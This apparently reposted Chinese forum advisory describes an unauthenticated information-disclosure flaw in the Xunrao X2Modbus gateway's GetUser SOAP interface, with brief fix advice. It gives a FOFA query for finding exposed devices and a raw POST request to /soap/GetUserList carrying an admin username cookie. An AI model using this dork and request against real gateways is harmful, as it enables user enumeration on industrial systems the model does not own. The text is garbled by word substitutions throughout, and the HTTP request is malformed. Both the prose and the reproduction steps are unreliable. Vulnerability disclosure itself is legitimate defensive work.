论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com技术社区
»
论坛
›
物联网
›
物联网
›
迅饶科技X2Modbus网关-GetUser信息泄露漏洞
迅饶科技X2Modbus网关-GetUser信息泄露漏洞
种地
论坛元老
|
2025-4-5 07:12:15
|
显示全部楼层
|
阅读模式
楼主
主题
1710
|
帖子
1710
|
积分
5130
免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请实时与我联系,我将尽快处理并删除相关内容。
漏洞形貌
该漏洞的存在是由于'GetUser'接口在处理SOAP哀求时,缺乏对哀求的充分验证和授权检查,任何人都可以通过发送特定的SOAP哀求,获取体系中存在的用户信息,攻击者可以通过发送包含合法用户凭据的SOAP哀求,绕过身份验证机制,直接获取用户数据。
漏洞再现
FOFA:server="SunFull-Webs"
在http://ip:898/login.html页面抓包,在重放器使用下面的格式
POST /soap/GetUserList
HTTP/1.1 ip
Cookie: language=zh-cn; language=zh-cn; username=admin
Content-Length: 12
Connection: close
{"CmpWc":""}
修复建议
对 GetUser 接口的输入举行严格的验证和过滤。确保输入的用户名和暗码符合预期的格式和长度,防止恶意用户通过构造特别字符或语句来获取信息。
定期检查迅饶科技官方网站或相关渠道,获取 X2Modbus 网关的最新安全补丁,并实时应用到体系中。厂商通常会修复已知的漏洞,通过更新补丁可以有用地防止攻击者使用这些漏洞举行信息泄露攻击。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
种地
论坛元老
这个人很懒什么都没写!
楼主热帖
Beta 阶段事后分析
mac下配置Charles,安装证书,连接iOS ...
为什么 SQL 语句使用了索引,但却还是 ...
图的基本术语,邻接矩阵、邻接表表示方 ...
python经典习题(一)
Archlinux scarlett solo driver insta ...
DOS窗口命令和单表简单查询
5.返回值IDCANCEL和CommDlgExtendedErr ...
利用kubernetes中的leader选举机制来完 ...
MySQL实战45讲 10
标签云
AI
运维
CIO
存储
服务器
浏览过的版块
公有云
Oracle
数据仓库与分析
DevOps与敏捷开发
云原生
开源技术
快速回复
返回顶部
返回列表